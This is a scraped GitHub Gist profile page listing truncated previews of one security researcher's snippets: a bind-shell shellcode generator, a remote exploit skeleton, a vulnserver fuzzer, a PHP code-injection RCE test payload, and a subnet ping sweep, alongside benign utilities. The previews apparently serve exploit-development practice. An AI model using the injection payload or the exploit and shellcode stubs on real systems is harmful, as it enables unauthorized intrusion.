Skip to content

Instantly share code, notes, and snippets.

Paolo Perego thesp0nge

Block or report user

Report or block thesp0nge

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@thesp0nge
thesp0nge / generate.py
Created Apr 19, 2019
bind shell shellcode encoded with SUB EAX technique
View generate.py
#!/usr/bin/env python
# Please install shellerate>=0.4.2 before: pip install shellerate
import sys
import string
import logging
import secrets
from shellerate import strings;
from shellerate import asm_x86;
from shellerate.bind_shellcode import BindShellcode;
@thesp0nge
thesp0nge / remote_exploit_skeleton.py
Last active Mar 15, 2019
A Skeleton for my remote exploit stuff
View remote_exploit_skeleton.py
#!/usr/bin/env python
import sys
import socket
def exploit(target, port):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
data=s.recv(1024)
View vulnserver_fuzzer.py
#/usr/bin/env python
import socket
import os
import sys
import select
import string
import random
COMMANDS = ["STATS", "RTIME", "LTIME", "SRUN", "TRUN", "GMON", "GDOG", "KSTET", "GTER", "HTER", "LTER", "KSTAN"]
@thesp0nge
thesp0nge / LICENSE
Last active Aug 21, 2019
A useless script to calculate the network address with the CIDR /xx notation in pure bash.
View LICENSE
Copyright (c) 2019 - Paolo Perego - paolo@armoredcode.com
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
@thesp0nge
thesp0nge / apt-security-check
Last active Jun 18, 2019
A slightly hacked version of apt-check that takes care only about security packages that need an update.
View apt-security-check
#!/usr/bin/python3
#
# apt-security-check - paolo@codiceinsicuro.it
#
# A slightly hacked version of apt-check that takes care only about security
# packages that need an update.
#
# Tested on Ubuntu 16.04.5 LTS, 18.04.1 LTS
@thesp0nge
thesp0nge / get_cookie.js
Created Oct 6, 2017
Get Single Cookie function
View get_cookie.js
View lotus_rce_exploit.py
#!/usr/bin/env python
import sys, socket, requests, urllib
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
uri="/index.php"
canary=urllib.urlencode({"page":"index');${print('THIS_IS_RANDOM_FOO')};#"})
View thepinger.sh
#!/bin/sh
PING=`which ping`
SUBNET="192.168.10."
for i in `seq 254`; do $PING -c 1 -W 1 $SUBNET$i | grep 'from' | cut -d' ' -f 4 | tr -d ':'; done
View Kali owasp_zap bin modified
#!/bin/sh
#for kali rolling, the startup script is very simple
cd /usr/share/zaproxy/
exec ./zap.sh $@
View w_gli_hacker.c
int test(char *s) {
printf("%s\n", s);
}
int main(int argc, char **argv) {
char *s;
test("pippo");
}
You can’t perform that action at this time.